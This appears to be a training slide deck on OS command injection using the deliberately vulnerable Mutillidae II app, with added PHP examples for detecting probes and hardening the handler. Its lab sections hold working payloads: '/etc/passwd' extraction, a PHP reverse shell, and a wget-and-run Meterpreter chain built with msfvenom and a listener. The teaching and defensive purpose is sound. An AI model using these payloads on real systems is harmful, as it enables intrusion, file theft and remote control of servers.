Web Application Security
OWASP A1 - Command Injection

Jeremy Druin
Certified Lead Information Security Analyst
WAPT-GOLD, GXPN, GPEN, GWAPT, GMOB, GSEC, Sec+

© Copyright Jeremy Druin - All Rights Reserved

INTRODUCTION TO INJECTION

Injection
• Injection may be possible when input (data) is incorporated with code/script fragments passed to an interpreter
• Any dynamically generated code/script passed to interpreters at runtime may be vulnerable
  • SQL, CGI, XML, JavaScript, SMTP, LDAP, Xpath, NoSQL
• An interpreter cannot distinguish the code from the data incorporated at runtime

Injection
• While the developer intends input to be treated as data, interpreters use context to decide what to execute
• Example
  Code: ping <user-supplied-input>
  Input Data: www.google.com
  Developer sees: ping www.google.com
  Interpreter sees: ping www.google.com
• Developer "knows" code is blue / data is red

Injection
• While the developer intends input to be treated as data, interpreters use context to decide what to execute
• Example
  Code: ping <user-supplied-input>
  Input Data: www.google.com; cat /etc/passwd
  Developer sees: ping www.google.com; cat /etc/passwd
  Interpreter sees: ping www.google.com; cat /etc/passwd
• Interpreter "knows" ping and cat are commands

Injection
• The developer intends for data to enter the application and assumes this will always be the case
• An interpreter cannot distinguish the code intended by the developer from the data incorporated at runtime
• Both code and data are ASCII text
• Interpreters attempt to use context to decide and "first match wins"
• From the interpreter's point of view the developer's intentions are ambiguous

INTRODUCTION TO COMMAND INJECTION

Command Injection
• Injecting snippets of shell script/CGI script into an application that passes operating system commands to the host
• May occur when application incorporates user supplied input into the host operating system command passed to the host
• Attack takes advantage of the trust the host (operating system) has in the application
• The trust boundary violated is between the web application and the operating system
• The attack executes on the host operating system under the application's account

COMMAND INJECTION BY EXAMPLE

Command Injection
• The DNS Lookup page in Mutillidae II passes the IP address/host name submitted by the user to the nslookup command
  http://mutillidae/index.php?page=dns-lookup.php

Command Injection
• Note: Mutillidae contains tutorials that may be helpful

Command Injection
Vulnerable server-side source code (field: target_host)

  $lTargetHost = $_REQUEST["target_host"];
  echo '<pre style="text-align:left;">'
      .shell_exec("nslookup " . $lTargetHost)
      .'</pre>';

Command Injection
• When user submits a value, the server incorporates the value into an operating system command

  $lTargetHost = $_REQUEST["target_host"];
  echo '<pre style="text-align:left;">'
      .shell_exec("nslookup " . $lTargetHost)
      .'</pre>';

  Submitted value: www.google.com
  Resulting command: nslookup www.google.com

Command Injection
• The O/S will execute the initial command then injected commands
  nslookup www.google.com; ls

Command Injection
• Commands can be chained
  nslookup www.google.com; cd /; ls

Command Injection
• Commands can be run to explore system, escalate privilege and open resources

  $lTargetHost = $_REQUEST["target_host"];
  echo '<pre style="text-align:left;">'
      .shell_exec("nslookup " . $lTargetHost)
      .'</pre>';

  Resulting command: nslookup www.google.com && cat /etc/passwd

Command Injection

LOCATING COMMAND INJECTION

Locating Command Injection
• Look for pages that appear to execute system commands
  • ping, nslookup, traceroute, etc.
  • CGI scripts

Locating Command Injection
• Attempt to identify the operating system
  • HTTP Response vanity headers
    • x-powered-by, Server, x-aspnet-version, etc.
  • May be able to infer operating system from clues
    • ASP.NET runs on Windows exclusively
    • IIS version is tied directly to operating system version

Locating Command Injection
• Attempt to identify the operating system
  • May be able to infer operating system from clues
    • ASP.NET runs on Windows exclusively
    • IIS version is tied directly to operating system version
  • Attempt to cause any error on any page
    • Error message may reveal operating system
  File paths imply Linux operating system

Locating Command Injection
• Attempt to fuzz input fields to cause error message
  • Characters reserved in operating system shell
    • /bin/bash: ! # $ % & ' ( ) * + , - . / : ; | ' ` , ; = ( ) ! " [ ] . * ?
  • Non-alphanumeric ASCII characters
  • Command injection values from Fuzz DB
• Note shell functions may not display standard error
• When assessing "blind" pages errors may be inferred by missing output

Locating Command Injection
• Blind Command Injection
  • Some vulnerable pages may not produce explicit output
  • Two methods may help detect command injection vulnerabilities in these cases
    • Missing output
    • Time-delay inference

Locating Command Injection
• When fuzzing for command injection note when pages are missing output
  • In some cases an error caused by fuzzing for command injection may interrupt the normal flow of execution
  • The site may suppress error messages resulting in neither normal output nor error output
  • The site may only display information from standard output (stdout) but not from the standard error file handle (stderr)
  • The injected value may halt execution of the shell command before the command can generate output
  • Use differential analysis to detect differences between a baseline response and other responses

Locating Command Injection
• By causing the response time to increase measurably it may be possible to detect command injection without visible output
• Use time-delay inference comparing the average time of a normal response against an attacker chosen time delay
• If the site is delayed as expected command injection has likely taken place
• Example
  • If a page typically takes two seconds to load and an attacker injects a command that takes 15 seconds to execute, a response time of 17 seconds implies vulnerability

Locating Command Injection
• Time-delay inference should be attempted with commands most users are allowed to execute that cause a predictable delay
• ping may work well due to running in one second increments and being executable by users on Windows and Linux against the loopback interface
  • Windows: ping -n 15 127.0.0.1
  • Linux: ping -i 15 -c 2 127.0.0.1
• Try prefixing and suffixing the injection with chaining characters discussed in upcoming slides
  • ||, |, &&, &, `, ;

TESTING COMMAND INJECTION

Testing Command Injection
• Once vulnerability located (or at least suspected) test for commands
• The source code prior to the injection point cannot be controlled
• The injection must work with the existing command
• Successful command injection typically requires chaining

  $lTargetHost = $_REQUEST["target_host"];
  echo '<pre style="text-align:left;">'
      .shell_exec("nslookup " . $lTargetHost)   // injection occurs here, so attacker influence begins at this point
      .'</pre>';

Testing Command Injection
• Command chaining allows one command to be executed once the previous completes

  Windows
  command1<newline>command2   Runs the first command then the second command
  command1 & command2         Runs the first command then the second command
  command1 && command2        Run second command only if first command successful
  command1 || command2        Run second command only if first command fails

Testing Command Injection
• Command chaining allows one command to be executed once the previous completes

  Linux
  command1<newline>command2   Runs the first command then the second command
  command1; command2          Runs the first command then the second command
  command1 & command2         Runs the first command then the second command
  command1 && command2        Run second command only if first command successful
  command1 || command2        Run second command only if first command fails

Testing Command Injection
• Start by injecting basic commands that are most likely to work at any privilege level
  • Linux
    • ls   list directory contents
    • pwd  print current directory path
  • Windows
    • dir  list directory contents
    • cd   print current directory path

Testing Command Injection
• Start by injecting basic commands that are most likely to work at any privilege level
  • Directory listing usually possible
  • Printing the current directory; PWD (Linux), CD (Windows) also generally ubiquitous

Testing Command Injection
• Attempt to chain commands based on operating system
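As an added example that is not part of the slides: the defender's counterpart to the locating and testing slides above, a scan over web server access log lines for requests to the dns-lookup page whose target_host value carries the shell-reserved characters, the chaining operators from the tables, or the ping time-delay probes described under Locating Command Injection. The log lines are constructed for the example and the function names extractTargetHost(), classifyTargetHost() and scanLog() are assumptions of this example.

```php
<?php
// Added example (not Mutillidae's or the author's code): flag command
// injection probes against the DNS Lookup page in access log lines.
// The four log lines below are constructed for this example.
const LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=dns-lookup.php&target_host=www.google.com HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?page=dns-lookup.php&target_host=www.google.com%3Bcat+%2Fetc%2Fpasswd HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /index.php?page=dns-lookup.php&target_host=127.0.0.1%26%26ping+-n+15+127.0.0.1 HTTP/1.1" 200 120',
    '10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?page=dns-lookup.php&target_host=mail.example.org HTTP/1.1" 200 498',
];

/** Return the URL-decoded target_host value from one log line, or null. */
function extractTargetHost(string $logLine): ?string
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return null;
    }
    // parse_str splits on the literal '&' first, then percent-decodes each
    // value, so an encoded %26 inside target_host stays inside the value.
    parse_str($query, $params);
    return isset($params['target_host']) ? (string) $params['target_host'] : null;
}

/**
 * Classify a target_host value; returns a list of reasons (empty = benign).
 * A legitimate value is an IP literal or a hostname, so any shell-reserved
 * character is suspicious on its own; chaining operators and the ping delay
 * probe from the slides are reported separately as signs of an active probe.
 */
function classifyTargetHost(string $value): array
{
    $reasons = [];
    if (preg_match('/[;&|`$]/', $value)) {
        $reasons[] = 'command chaining operator';
    }
    if (preg_match('/[!#%\'()*+,:<>?\[\]{}"\\\\\s\/]/', $value)) {
        $reasons[] = 'shell-reserved character';
    }
    // ping -n <seconds> (Windows) or ping -i <seconds> (Linux), as on the slides
    if (preg_match('/\bping\s+-[ni]\s+\d+/i', $value)) {
        $reasons[] = 'time-delay probe';
    }
    return $reasons;
}

/** Run the classifier over log lines; returns [line => reasons] for hits only. */
function scanLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $target = extractTargetHost($line);
        if ($target === null) {
            continue;
        }
        $reasons = classifyTargetHost($target);
        if ($reasons !== []) {
            $hits[$line] = $reasons;
        }
    }
    return $hits;
}

// Lines 2 and 3 are flagged; the two plain hostnames are not.
foreach (scanLog(LOG_LINES) as $line => $reasons) {
    echo 'ALERT (' . implode(', ', $reasons) . '): ' . $line . "\n";
}
```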

USING COMMAND INJECTION

Command Injection
• Once command injection established work towards control of system
  • Determine account and privilege level of current user
  • Determine current location within file system
  • Catalog, locate and pilfer available files
  • Test for outbound connectivity and try to establish shell
  • Attempt to persist access
  • Pivot into internal network

Command Injection Example
• Determine account and privilege level of current user
  www.google.com;whoami;pwd;ls
  whoami: print current user account

Command Injection Example
• Determine current location within file system
  www.google.com;whoami;pwd;ls
  pwd: print current directory
  ls: list contents of current directory

Command Injection Example
• Catalog, locate and pilfer available files
  www.google.com; cat /etc/passwd

COMMAND INJECTION DEFENSE

Command Injection Defense
• Default Deny
• Least Privilege
• Data Execution Prevention

Command Injection Defense
• Default Deny
  • By default the web application account must not be allowed to run any shell commands
  "Someone please explain why this apache server account is allowed to ping. Do web servers need to check to see if their cousin IIS is online?"

Command Injection Defense
• Default Deny
  • If operating system functionality is necessary attempt to call a standard framework function that will supply the same result
  • For example if a PHP application needs to resolve a hostname use standard function gethostbyaddr() rather than executing nslookup via shell_exec()

Command Injection Defense
• Least Privilege
  • The least-privilege principle states applications must only execute specific, preapproved commands
  • Default deny will prevent any commands from executing under the web application account
  • Least-privilege effectively is an exception to default deny for the necessary commands (executables)

Command Injection Defense
• Data Execution Prevention
  • All non-alpha-numeric parameter values passed to the shell script must be escaped
    • Bash: \0xx translates to the octal ASCII equivalent of "nn", where "nn" is a string of digits
  • Input could be shell-script or data, but the interpreter (i.e. Bash) "knows" escaped characters are data
  • This is true even when the input forms syntactically correct shell-script
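A hardened replacement for the DNS Lookup handler shown on the earlier slides, written here as an added example (it is not Mutillidae's code or the author's). It applies the Default Deny advice above (resolve with PHP's own resolver functions instead of shell_exec()) and the escaping advice (escapeshellarg() as defense in depth where a shell command truly cannot be avoided). It assumes the same target_host request field; the function names validateTargetHost(), lookupTargetHost() and buildNslookupCommand() are assumptions of this example.

```php
<?php
// Added example (not Mutillidae's or the author's code): hardened version of
// the DNS Lookup handler. Assumes the same request field, target_host.

/**
 * Validate the user-supplied target. Accept only an IP literal or a
 * syntactically valid hostname; anything containing shell metacharacters
 * (; & | ` $ ( ) whitespace, ...) fails validation. Returns null on reject.
 */
function validateTargetHost(string $input): ?string
{
    $input = trim($input);
    if ($input === '' || strlen($input) > 253) {
        return null;
    }
    if (filter_var($input, FILTER_VALIDATE_IP) !== false) {
        return $input;
    }
    if (filter_var($input, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false) {
        return $input;
    }
    return null;
}

/**
 * Default deny: no shell at all. The lookup uses PHP's resolver functions,
 * so there is no command string for the input to break out of.
 * Returns display lines (empty when nothing resolved).
 */
function lookupTargetHost(string $target): array
{
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        // Address -> name (gethostbyaddr, as the slide suggests); it returns
        // the unmodified address when no reverse record exists.
        $name = gethostbyaddr($target);
        return ($name === false || $name === $target) ? [] : ["$target has name $name"];
    }
    // Name -> all IPv4 addresses
    $addresses = gethostbynamel($target);
    if ($addresses === false) {
        return [];
    }
    return array_map(fn(string $a): string => "$target has address $a", $addresses);
}

/**
 * Defense in depth, only where a shell command truly cannot be avoided:
 * escapeshellarg() wraps the value in single quotes and escapes embedded
 * quotes, so the shell sees one argument and never a second command.
 * "www.google.com; cat /etc/passwd" becomes one quoted nslookup argument.
 */
function buildNslookupCommand(string $target): string
{
    return 'nslookup ' . escapeshellarg($target);
}

// Request handling. Compare with the vulnerable original on the slides:
//   shell_exec("nslookup " . $_REQUEST["target_host"])
$lTargetHost = (string) ($_REQUEST['target_host'] ?? '');
$validated   = validateTargetHost($lTargetHost);

echo '<pre style="text-align:left;">';
if ($validated === null) {
    // Reject, log the attempt for detection, and do not echo the raw value back.
    error_log('dns-lookup: rejected target_host from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    echo 'Invalid host name or IP address';
} else {
    foreach (lookupTargetHost($validated) as $line) {
        echo htmlspecialchars($line, ENT_QUOTES, 'UTF-8'), "\n";
    }
}
echo '</pre>';
```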

Command Injection
LAB

Command Injection
• Extract /etc/passwd

Command Injection to extract /etc/passwd
• The DNS lookup page in Mutillidae II contains a command injection vulnerability
  • Ubuntu
    • http://localhost/mutillidae/index.php?page=dns-lookup.php
  • Samurai WTF
    • http://mutillidae/index.php?page=dns-lookup.php

Command Injection to extract /etc/passwd
• Locate the command injection vulnerability using command separators and universal binaries
  • & ls
  • | ls
  • ; ls
  • Others

Command Injection to extract /etc/passwd
• Determine the current directory
  • & pwd

Command Injection to extract /etc/passwd
• Use directory traversal to move out of the web root directory and access /etc/passwd
  • & cat /etc/passwd

Command Injection
LAB

Command Injection
• Reverse bash shell
  • Reference: demo-command-injection-reverse-shell-via-php.txt

Command injection to gain reverse bash shell
• The DNS lookup page in Mutillidae II contains a command injection vulnerability
  • Ubuntu
    • http://localhost/mutillidae/index.php?page=dns-lookup.php
  • Samurai WTF
    • http://mutillidae/index.php?page=dns-lookup.php

Command injection to gain reverse bash shell
• Locate the command injection vulnerability using command separators and universal binaries
  • & ls
  • | ls
  • ; ls
  • Others

Command injection to gain reverse bash shell
• Send commands testing outbound connectivity from vulnerable server back to attacker controlled host
  • Set up listener on attacker controlled host
  • Attempt to have web application server reach out to attacker host over various protocols and ports
    • ICMP → ping -c 1 10.0.0.164
    • UDP → tracepath -c 1 10.0.0.164
    • TCP → telnet 10.0.0.164 1234
  • Test ports and protocols likely to be allowed
    • DNS, web, proxy, etc.

Command injection to gain reverse bash shell
• Set up tcpdump on local host filtering for incoming packets destined for attacker IP
  • tcpdump -i eth0 -vv -X dst

Command injection to gain reverse bash shell
• Attempt to have web application send packet
  • www.google.com; tracepath -c 1 10.224.35.168 (UDP)
  • www.google.com & telnet 10.224.35.168 1234 (TCP)
  Attacking host receives packet confirming connectivity

Command injection to gain reverse bash shell
• If outbound connectivity established attempt to have web server connect back to attacker host
  • Set up listener on attacker host: nc -l -p 1234

Command injection to gain reverse bash shell
• If outbound connectivity established attempt to have web server connect back to attacker host
  • Once listener set-up, ask web application server to connect back to attacker host
  • Set IP address appropriately
    www.google.com;php -r '$sock=fsockopen(”",<port>);exec("/bin/sh -i &3 2>&3");'

Command injection to gain reverse bash shell
• Once web application server establishes connection, a shell should be opened
  • Note a shell is not a terminal
  • The shell runs with the privileges of the web application account
  Type commands into shell

Command Injection
LAB

Command Injection
• Reverse Meterpreter
  • Reference: demo-command-injection-via-meterpreter-php-shell-upload.txt

Command injection to gain reverse Meterpreter shell
• The DNS lookup page in Mutillidae II contains a command injection vulnerability
  • Ubuntu
    • http://localhost/mutillidae/index.php?page=dns-lookup.php
  • Samurai WTF
    • http://mutillidae/index.php?page=dns-lookup.php

Command injection to gain reverse Meterpreter shell
• Locate the command injection vulnerability using command separators and universal binaries
  • & ls
  • | ls
  • ; ls
  • Others

Command injection to gain reverse Meterpreter shell
• Send commands testing outbound connectivity from vulnerable server back to attacker controlled host
  • Set up listener on attacker controlled host
  • Attempt to have web application server reach out to attacker host over various protocols and ports
    • ICMP → ping -c 1 10.0.0.164
    • UDP → tracepath -c 1 10.0.0.164
    • TCP → telnet 10.0.0.164 1234
  • Test ports and protocols likely to be allowed
    • DNS, web, proxy, etc.

Command injection to gain reverse Meterpreter shell
• Set up tcpdump on local host filtering for incoming packets destined for attacker IP
  • tcpdump -i eth0 -vv -X dst

Command injection to gain reverse Meterpreter shell
• Attempt to have web application send packet
  • www.google.com; tracepath -c 1 10.224.35.168 (UDP)
  • www.google.com & telnet 10.224.35.168 1234 (TCP)
  Attacking host receives packet confirming connectivity

Command injection to gain reverse Meterpreter shell
• Assuming vulnerable web server can connect back to attacker host, it may be possible to force web server to download payload
  • A web server can be set up on attacker host
  • A command injection can cause web server to download and execute content
    wget http://<attacker IP>/php-meter-script.txt -O /tmp/php-meter-script.php   (download and save file from attacker host)
    php -f /tmp/php-meter-script.php   (execute file with PHP interpreter)

Command injection to gain reverse Meterpreter shell
• Search available payloads for those that offer PHP Meterpreter
  msfvenom --list payloads | grep php/meter

Command injection to gain reverse Meterpreter shell
• Use msfvenom to generate Meterpreter PHP payload
  msfvenom --arch php --platform PHP --payload php/meterpreter/reverse_tcp --format raw lhost=<attacker IP> lport=<attacker port> > /var/www/html/commented-php-meter-script.txt

Command injection to gain reverse Meterpreter shell
• msfvenom puts a comment symbol at the front of the PHP Meterpreter payload
• Remove the comment symbol
  sed 's/\/\*//' /var/www/html/commented-php-meter-script.txt > /var/www/html/php-meter-script.txt

Command injection to gain reverse Meterpreter shell
• Start Apache web server running on attacking host
  • The web server will serve the Meterpreter PHP shell when the vulnerable web server requests the file

Command injection to gain reverse Meterpreter shell
• Start a listener on the attacking host for Meterpreter to connect
  msfconsole
  msf > use multi/handler
  msf exploit(handler) > set payload php/meterpreter/reverse_tcp
  msf exploit(handler) > set lhost <attacker IP>
  msf exploit(handler) > set lport <attacker port>
  msf exploit(handler) > exploit

Command injection to gain reverse Meterpreter shell
• Inject command to cause web server to pull file from attacking host and execute Meterpreter script
  & ;wget http://10.224.35.168/php-meter-script.txt -O /tmp/php-meter-script.php;php -f /tmp/php-meter-script.php

Command injection to gain reverse Meterpreter shell
• If the user under which the web server is running has privileges, the web server will connect back to attacking host